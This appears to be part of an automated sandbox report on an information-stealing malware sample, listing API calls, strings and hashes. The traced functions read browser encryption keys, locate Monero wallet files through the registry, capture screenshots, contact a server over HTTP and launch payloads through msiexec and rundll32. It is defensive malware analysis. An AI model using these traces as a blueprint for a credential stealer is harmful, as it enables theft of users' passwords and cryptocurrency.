                                      • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0230CCD3
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0230CCF0
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0230CCFC
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0230CD0F
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0230CD1C
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0230CD40
                                      • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0230CD5E
                                      • StrStrA.SHLWAPI(00000000,0064A364), ref: 0230CD85
                                      • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0230CF09
                                      • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0230CF20
                                        • Part of subcall function 0230CA87: memset.MSVCRT ref: 0230CABA
                                        • Part of subcall function 0230CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0230CAD8
                                        • Part of subcall function 0230CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0230CAE3
                                        • Part of subcall function 0230CA87: memcpy.MSVCRT(?,?,?), ref: 0230CB79
                                      • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0230CFC1
                                      • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0230CFD8
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B46), ref: 0230CBAA
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B47), ref: 0230CBBE
                                        • Part of subcall function 0230CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0230CBDF
                                      • lstrlen.KERNEL32(00000000), ref: 0230D0AB
                                      • CloseHandle.KERNEL32(00000000), ref: 0230D103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction ID: d14493c5e60cf361fa612e29ad9d3fe0d31451eca43255aa51e6a7165a644351
                                      • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction Fuzzy Hash: ACE1F076901248AFCB29EBE4DD94FEEB77AAF14301F004159F106A7190EF346A89CF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,0087EC00,00000000,00020019,00000000,004205B6), ref: 004183A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                      • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                      • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                      • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memset.MSVCRT ref: 00410C1C
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                      • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                      • lstrlenA.KERNEL32(?), ref: 00410CA7
                                      • memset.MSVCRT ref: 00410CCD
                                      • memset.MSVCRT ref: 00410CE1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID: .exe
                                      • API String ID: 1395395982-4119554291
                                      • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                      • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                      • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                      • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                      • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                      • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                      • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                      APIs
                                      • strtok_s.MSVCRT ref: 00411307
                                      • strtok_s.MSVCRT ref: 00411750
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                      • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                      • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                      • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                      • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                      • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                      • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                      APIs
                                      • memset.MSVCRT ref: 0041429E
                                      • memset.MSVCRT ref: 004142B5
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                      • lstrcatA.KERNEL32(?,008807A0), ref: 0041430B
                                      • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                      • lstrcatA.KERNEL32(?,00880E18), ref: 00414333
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                      • StrStrA.SHLWAPI(?,00881EB8), ref: 004143F3
                                      • GlobalFree.KERNEL32(?), ref: 00414512
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                      • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                      • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                      • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                      • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                      • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                      APIs
                                      • memset.MSVCRT ref: 02314505
                                      • memset.MSVCRT ref: 0231451C
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02314553
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 02314572
                                      • lstrcat.KERNEL32(?,?), ref: 02314586
                                      • lstrcat.KERNEL32(?,0064A5D8), ref: 0231459A
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02318FF7: GetFileAttributesA.KERNEL32(00000000,?,02301DBB,?,?,00425654,?,?,00420E1F), ref: 02319006
                                        • Part of subcall function 02309F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02309FA0
                                        • Part of subcall function 02309F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02309FF9
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                        • Part of subcall function 02319627: GlobalAlloc.KERNEL32(00000000,02314644,02314644), ref: 0231963A
                                      • StrStrA.SHLWAPI(?,0064A0D8), ref: 0231465A
                                      • GlobalFree.KERNEL32(?), ref: 02314779
                                        • Part of subcall function 02309D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D56
                                        • Part of subcall function 02309D27: LocalAlloc.KERNEL32(00000040,?,?,?,02305155,00000000,?), ref: 02309D68
                                        • Part of subcall function 02309D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D91
                                        • Part of subcall function 02309D27: LocalFree.KERNEL32(?,?,?,?,02305155,00000000,?), ref: 02309DA6
                                        • Part of subcall function 0230A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231470A
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 02314727
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02314739
                                      • lstrcat.KERNEL32(00000000,?), ref: 0231474C
                                      • lstrcat.KERNEL32(00000000,00420FB8), ref: 0231475B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction ID: 2dd1413e4efc10df217f51261e1c5a6ba22c4d96e5a4398f225d3d3edbe0ca8b
                                      • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction Fuzzy Hash: BB7164B6900218BBDB28FBE0DC99FEE737AAF48700F008598E60596180EB35D745CF61
                                      APIs
                                      • memset.MSVCRT ref: 00401327
                                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                      • lstrlenA.KERNEL32(?), ref: 0040135C
                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                      • memset.MSVCRT ref: 00401516
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 1930502592-218353709
                                      • Opcode ID: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                      • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                                      • Opcode Fuzzy Hash: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                      • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3532888709-1526165396
